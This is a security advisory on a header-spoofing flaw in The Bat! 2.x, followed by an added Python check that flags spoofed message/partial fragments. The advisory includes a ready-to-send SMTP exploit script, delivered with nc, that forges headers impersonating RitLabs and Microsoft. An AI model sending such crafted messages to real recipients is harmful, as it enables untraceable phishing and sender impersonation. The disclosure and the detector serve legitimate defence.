`
Title: The Bat! 2.x message headers spoofing
Author: 3APA3A <[email protected]>
Homepage: http://www.security.nnov.ru/
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp
Vendor: RitLabs
Vendor's page: http://thebat.net/
Application: The Bat 2.x (2.12.04 tested)
Not vulnerable: The Bat! 3.5
Remote: Yes, against client
Category: Information spoofing
Intro:
The Bat! is a very convenient, powerful and secure (compared with
others) MUA (Mail User Agent) with many professional features:
templates, macros, Bayesian SPAM filter, etc. It is a commercial
product from RitLabs.
Vulnerability:
A design flaw in the way The Bat! shows message/partial messages allows
an attacker to spoof the RFC 822 headers of the original message,
including _all_ Received: and Message-ID: headers. This makes it possible
to create an untraceable message and spoof the message origin, including
the sender's network.
Details:
The Bat! silently re-assembles a partial message and shows the
encapsulated data. The headers shown are those of the encapsulated
message. The real headers are lost completely.
Exploit:
Replace @example.com with the destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt
-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
number=1; total=2
Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Dear Phiby,
Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <[email protected]>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
number=2; total=2
Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-
Workaround:
Do not trust the data The Bat! shows in headers.
Solution:
Upgrade to The Bat! 3.x (not free)
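
Added example, not part of the original advisory: a Python check for a mail filter or analyst that applies the RFC 2046 section 5.2.2.1 reassembly rule, under which only Content-*, Subject, Message-ID, Encrypted and MIME-Version are taken from the enclosed message and all other headers come from the real outer message. The function names and the sample fragment (example.* hosts) are constructed for illustration.

```python
from email.parser import HeaderParser

# RFC 2046 5.2.2.1: on reassembly only these enclosed fields (plus Content-*)
# are used; every other enclosed header must be ignored and the outer one kept.
INNER_KEPT = {"subject", "message-id", "encrypted", "mime-version"}

def inner_allowed(name):
    n = name.lower()
    return n.startswith("content-") or n in INNER_KEPT

def split_fragment(raw):
    """Return (outer, inner) header sets, or None if raw is not fragment 1."""
    outer = HeaderParser().parsestr(raw)   # headers only, body kept as text
    if outer.get_content_type() != "message/partial":
        return None
    if str(outer.get_param("number")) != "1":
        return None                        # later fragments carry body only
    return outer, HeaderParser().parsestr(outer.get_payload())

def dropped_inner_headers(raw):
    """Enclosed headers a compliant client ignores (Received, From, ...).
    Their presence in fragment 1 is what the advisory's spoof relies on."""
    parts = split_fragment(raw)
    if parts is None:
        return []
    return [k for k in parts[1].keys() if not inner_allowed(k)]

def reassembled_headers(raw):
    """Headers a compliant client should display for the rebuilt message."""
    outer, inner = split_fragment(raw)
    kept = [(k, v) for k, v in outer.items() if not inner_allowed(k)]
    return kept + [(k, v) for k, v in inner.items() if inner_allowed(k)]

# Constructed sample: fragment 1 whose enclosed message claims another origin.
SAMPLE = (
    "Received: from relay.example.net by mx.example.com; Mon, 30 Jan 2006 13:30:00 +0300\n"
    "From: Real Sender <real@example.net>\n"
    "Message-ID: <outer-1@example.net>\n"
    "MIME-Version: 1.0\n"
    'Content-Type: message/partial; id="frag@example.net"; number=1; total=2\n'
    "\n"
    "Received: from trusted.example.org by mx.example.com; Mon, 30 Jan 2006 13:30:06 +0300\n"
    "From: Trusted Team <team@example.org>\n"
    "Message-ID: <inner-1@example.org>\n"
    "Content-Type: text/plain\n"
    "\n"
    "body text\n"
)

if __name__ == "__main__":
    print("enclosed headers to ignore:", dropped_inner_headers(SAMPLE))
```

A non-empty result from dropped_inner_headers on the stored raw message means the headers a vulnerable client displays after reassembly may not be the ones the message actually travelled with.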
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
`